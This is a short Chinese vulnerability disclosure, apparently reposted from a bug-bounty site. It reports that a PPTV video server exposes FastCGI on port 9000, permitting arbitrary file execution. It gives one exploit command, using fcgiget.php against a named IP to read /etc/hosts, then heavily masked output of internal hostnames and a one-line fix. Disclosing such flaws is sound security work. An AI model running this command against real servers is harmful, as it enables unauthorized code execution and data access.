首页 » 漏洞 » PPTV某视频源服务器配置不当导致任意代码执行10T小电影任你播放

PPTV某视频源服务器配置不当导致任意代码执行10T小电影任你播放

 

60.55.12.146 9000端口fastcgi对外,导致cgi可执行任意文件

code 区域

mask 区域
1.://**.**.**/usr/local/php/bin/php fcgiget.php 60.55.12.146:9000/etc/hosts_

**********

**********

**********

*****wing line, or*****

*****functionalit*****

*****t.localdom*****

*****aldomain6 *****

*****nx-12-146.i*****

*****inx-12-146.i*****

*****ap-36-72.id*****

**********

***** src.pan*****

*****play.api*****

*****play.api*****

**********

*****nginx-205-161*****

*****nginx-205-162*****

*****nginx-205-163*****

*****nginx-205-164*****

*****nginx-205-165*****

*****nginx-205-166*****

*****nginx-205-167*****

*****nginx-205-168*****

*****nginx-205-169*****

*****nginx-205-170*****

**********

*****_Source-74-1*****

*****_Source-74-1*****

*****_Source-74-6*****

*****_Source-74-1*****

**********

*****nginx-44-41.*****

*****nginx-44-42.*****

*****nginx-44-43.*****

*****nginx-44-44.*****

*****nginx-44-45.*****

*****sw3.idc.*****

*****12-146.vs-cdn-s*****

*****-12-146.vs-cdn-s*****

*****1 RTMP*****

漏洞证明:

PPTV某视频源服务器配置不当导致任意代码执行10T小电影任你播放

嗯,这是你们的hosts

PPTV某视频源服务器配置不当导致任意代码执行10T小电影任你播放

10T资源

修复方案:

fastcgi不能对外

原文链接:PPTV某视频源服务器配置不当导致任意代码执行10T小电影任你播放,转载请注明来源!

0